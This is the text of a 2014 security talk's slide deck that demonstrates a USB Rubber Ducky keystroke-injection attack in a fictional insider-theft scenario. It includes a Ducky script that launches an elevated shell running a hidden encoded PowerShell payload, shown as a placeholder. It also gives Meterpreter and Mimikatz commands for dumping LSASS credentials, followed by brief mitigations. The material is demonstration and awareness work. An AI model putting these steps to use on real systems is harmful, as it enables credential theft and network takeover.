Duck hunter - the return of autorun this presentation presents concept of computer attacks

1. 10/02/2014 Nimrod Levy
Information security consultant
Duck Hunter
The return of autorun

2. $ WHOAMI
• Information Security consultant at 2Bsecure@Matrix
• Certified OSCP (Offensive Security Certified Professional)
• Security tools personally developed:
 AutoBrowser 3.0
 Subdomain Analyzer
 PyWeakServices tool
• 1st Place at The Israel Cyber Challenge, 2014
The Symantec™​ Cyber Readiness Challenge was hosted during the CyberTech event

3. The mission
We are employees in the “Fakesoft” company and we are
very disappointed by the way the administration is
behaving.
We think that we can develop the software by ourselves
and make a fortune. We need to find a way to take over a
"Domain Admin" user account, through this account get
access to the backup server, and copy the source code of
the software.

4. Obstacles
• Antivirus software is installed and running on end-user
stations.
• No internet access.
• Segmentation with a central firewall
• Use of all removable storage is denied from the stations.

5. Programmable HID USB
Keyboard
USB Rubber ducky:
USB rubber ducky is a smart device
which can emulate a keyboard or a
mouse when connected to a
computer and can execute a pre
programmed instructions.

6. Programmable HID USB
Keyboard
Examples of attack vector scenarios:
• Add users to the system
• Deploy and run programs
• Upload local files
• Download and install apps
• Go to website that the victim has cookies for, and perform
a CSRF attack.

7. Attack process
60 seconds
Idea
Write
EncodeLoad
Deploy

8. Scenario code
DELAY 3000
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
LEFTARROW
DELAY 400
ENTER
DELAY 800
ENTER
ENTER
STRING powershell -nop -wind hidden -noni –enc METERPRETER ENCRYPTED AND ENCODED
PAYLOAD
ENTER

9. What do we need ?
Meterpreter payload stager:
Meterpreter is an advanced, dynamically extensible payload
that uses in-memory DLL injection stagers and is extended
over the network at runtime.

10. What do we need ?
Mimikatz:
Mimikatz is a post-exploitation tool written by Benjamin
Delpy (gentilkiwi).
The functionality of Mimikatz we can use is the dumped
sessions saved within LSASS and obtain clear-text
credentials of user accounts that connected to this machine.

11. Post-exploitation scenario
Command Explanation
getsystem Attempt to elevate your privilege to local
system.
load mimikatz Loading mimikatz extension
mimikatz_command -f
sekurlsa::logonPasswords full
Run a custom command.
This module extracts passwords that saved
on lsass memory
background Backgrounds the current session

12. Result
Now we have taken control of a domain admin account that
is not linked directly to us. What can we do?
• Copy the source code we initially wanted.
• Delete or manipulate sensitive organizational data.
• Full control of user account management.
• Install malicious applications using the GPO.

13. Mitigation
• Define a whitelist for authorized devices.
• Increase awareness for social engineering among the
employees.

14. Questions
Nimrod.Levy@2bsecure.co.il